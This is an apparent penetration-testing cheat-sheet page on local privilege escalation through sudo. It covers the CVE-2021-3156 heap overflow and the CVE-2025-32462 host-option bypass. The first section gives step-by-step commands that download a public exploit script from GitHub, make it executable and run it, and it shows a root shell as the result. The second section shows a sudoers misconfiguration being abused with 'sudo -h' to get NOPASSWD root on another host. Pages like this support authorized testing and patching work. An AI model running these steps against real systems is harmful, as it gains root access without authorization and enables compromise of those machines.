Sudo

SudoEdit

sudo < 1.9.5p2 is susceptible to a heap-based buffer overflow (CVE-2021-3156) and a PoC is available.

# Check the target's sudo version
$ sudo --version
Sudo version 1.8.31

# Download the PoC to the target
$ wget https://raw.githubusercontent.com/worawit/CVE-2021-3156/refs/heads/main/exploit_nss.py

# Assign execute permissions
$ chmod +x exploit_nss.py

# Run the exploit
$ ./exploit_nss.py
...
# id
uid=0(root) gid=0(root) groups=0(root),998(apache),1004(anita)

Host Bypass

Sudo versions < 1.9.17p1 are vulnerable to CVE-2025-32462. If the sudoers file lists a host that isn't the current machine (and isn't ALL), users could exploit that to run commands as if they were on that other host.

For example, in the below sudoers configuration:

sudoers

# Host alias specification
Host_Alias     SERVERS        = host-1.example.local, host-2.example.local
Host_Alias     PROD           = host-1.example.local
x7331           SERVERS, !PROD = NOPASSWD:ALL

The rule expands to...

(host-1.example.local, host-2.example.local) and NOT (host-1.example.local)

...which evaluates to only host-2.example.local — so it permits x7331 NOPASSWD on host-2:

# Test for sudo privileges
x7331@host-1:~$ sudo -l
Password:
Sorry, user x7331 may not run sudo on host-1.

# Test sudo with the internal host referenced in logs
x7331@host-1:~$ sudo -h host-2.example.local -l
Matching Defaults entries for x7331 on host-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User user may run the following commands on host-2:
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL

PreviousScreen NextSystemctl

Last updated 2 months ago

Was this helpful?